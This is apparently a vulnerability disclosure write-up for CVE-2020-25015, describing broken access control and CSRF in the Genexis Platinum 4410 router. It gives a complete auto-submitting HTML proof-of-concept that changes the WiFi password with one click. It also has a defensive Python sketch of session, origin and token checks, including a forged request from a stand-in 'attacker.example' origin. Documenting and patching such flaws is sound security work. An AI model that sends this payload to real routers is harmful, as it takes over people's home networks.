Broken Access Control & CSRF in Genexis Platinum 4410 Router V2.1

Updated on: October 19, 2020

While testing the Genexis Platinum 4410 home router version 2.1 (software version P4410-V2-1.28), I was able to find that the router is vulnerable to Broken Access Control and CSRF.

CVE ID: CVE-2020-25015

Summary

Platinum 4410 is a compact router from Genexis that is commonly used in homes. Hardware version V2.1 with software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF, which could be combined to remotely change the WiFi access point’s password.

Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.

— OWASP

For more information on CSRF, please visit this article.

Impact

An attacker can send the victim a link. If the victim clicks it while connected to the WiFi network established by the vulnerable router, the password of the WiFi access point will be changed via the CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.

Vulnerability

Ordinarily, this attack would be troublesome to carry out, because a successful CSRF attack requires the victim to be logged in to the application under attack (in this case, the web-based setup page at 192.168.1.1), and most router setup pages end user sessions automatically. Additionally, customers rarely visit their router’s setup page. However, due to the broken access control vulnerability in the latest version of the firmware at the time of reporting, the request to change the password could be sent by unauthenticated parties as well.

Thus combining the CSRF and Broken Access Control vulnerabilities on this version of the firmware, an attacker can create an HTML document with the following code and bait the user into submitting it.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
      <input type="hidden" name="wlEnbl" value="ON" />
      <input type="hidden" name="hwlKeys0" value="" />
      <input type="hidden" name="hwlKeys1" value="" />
      <input type="hidden" name="hwlKeys2" value="" />
      <input type="hidden" name="hwlKeys3" value="" />
      <input type="hidden" name="hwlgMode" value="9" />
      <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
      <input type="hidden" name="hwlEnbl" value="1" />
      <input type="hidden" name="hWPSMode" value="1" />
      <input type="hidden" name="henableSsid" value="1" />
      <input type="hidden" name="hwlHide" value="0" />
      <input type="hidden" name="isInWPSing" value="0" />
      <input type="hidden" name="WpsConfModeAll" value="7" />
      <input type="hidden" name="WpsConfModeNone" value="0" />
      <input type="hidden" name="hWpsStart" value="0" />
      <input type="hidden" name="isCUCSupport" value="0" />
      <input type="hidden" name="SSIDPre" value="N&#47;A" />
      <input type="hidden" name="bwControlhidden" value="0" />
      <input type="hidden" name="ht&#95;bw" value="1" />
      <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
      <input type="hidden" name="wlChannel" value="0" />
      <input type="hidden" name="wlTxPwr" value="1" />
      <input type="hidden" name="wlSsidIdx" value="0" />
      <input type="hidden" name="SSID&#95;Flag" value="0" />
      <input type="hidden" name="wlSsid" value="JINSON" />
      <input type="hidden" name="wlMcs" value="33" />
      <input type="hidden" name="bwControl" value="1" />
      <input type="hidden" name="giControl" value="1" />
      <input type="hidden" name="enableSsid" value="on" />
      <input type="hidden" name="wlAssociateNum" value="32" />
      <input type="hidden" name="wlSecurMode" value="WPAand11i" />
      <input type="hidden" name="wlPreauth" value="off" />
      <input type="hidden" name="wlNetReauth" value="1" />
      <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
      <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
      <input type="hidden" name="wlWpaGtkRekey" value="" />
      <input type="hidden" name="wlRadiusIPAddr" value="" />
      <input type="hidden" name="wlRadiusPort" value="" />
      <input type="hidden" name="wlRadiusKey" value="" />
      <input type="hidden" name="wlWpa" value="TKIPAES" />
      <input type="hidden" name="wlKeyBit" value="64" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="WpsActive" value="0" />
      <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
      <input type="hidden" name="pinvalue" value="" />
      <input type="hidden" name="Save&#95;Flag" value="1" />
      <input type="submit" value="Submit request" />
    </form>
     <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

As long as the victim is connected to the WiFi access point established by the affected router, the password of the access point would get changed as shown in the video below.
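
The two server-side checks whose absence makes the form above work, an authenticated session and proof that the request came from the router's own setup page, are shown here as an added example. It is not Genexis firmware code; the session store, the `session` cookie, the `csrf_token` field and the `authorize` function are assumptions made for illustration.

```python
import hmac
from urllib.parse import urlsplit

# Hypothetical names and values throughout; this is not Genexis firmware code.
ROUTER_ORIGINS = {"http://192.168.1.1"}     # origins the setup page is served from
STATE_CHANGING = {"/cgi-bin/net-wlan.asp"}  # endpoint named in the advisory
SESSIONS = {"s3ss10n-constructed": "t0k3n-constructed"}  # session id -> CSRF token


def origin_of(headers):
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None  # absent, "null" or malformed: treated as untrusted
    return f"{parts.scheme}://{parts.netloc}"


def authorize(method, path, headers, cookies, form):
    """Decide whether a request may change settings; returns (allowed, reason)."""
    if method != "POST" or path not in STATE_CHANGING:
        return True, "not a state-changing request"
    # 1. Access control: a valid session is required before anything else.
    expected_token = SESSIONS.get(cookies.get("session", ""))
    if expected_token is None:
        return False, "no authenticated session"
    # 2. CSRF: the request must come from the router's own pages...
    if origin_of(headers) not in ROUTER_ORIGINS:
        return False, "cross-origin request"
    # ...and carry the per-session token that only those pages can read.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), expected_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed requests: the auto-submitted form from another site, and a real save.
FORGED = dict(method="POST", path="/cgi-bin/net-wlan.asp",
              headers={"Origin": "http://attacker.example"}, cookies={},
              form={"wlWpaPsk": "NEWPASSWORD", "Save_Flag": "1"})
LEGIT = dict(method="POST", path="/cgi-bin/net-wlan.asp",
             headers={"Origin": "http://192.168.1.1"},
             cookies={"session": "s3ss10n-constructed"},
             form={"wlWpaPsk": "example-passphrase",
                   "csrf_token": "t0k3n-constructed"})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, authorize(**req))
```

The session check alone stops the unauthenticated request described above; the origin and token checks are what still reject the same form when the victim happens to be logged in.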

Timeline

  • Vulnerability reported to the Genexis team on August 28, 2020
  • Team confirmed firmware release containing fix on September 14, 2020

Recommendation

  • As per the Genexis team, customers should contact their ISP in order to get access to the latest firmware.
  • Use a more secure router if you are unable to upgrade the firmware.


Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.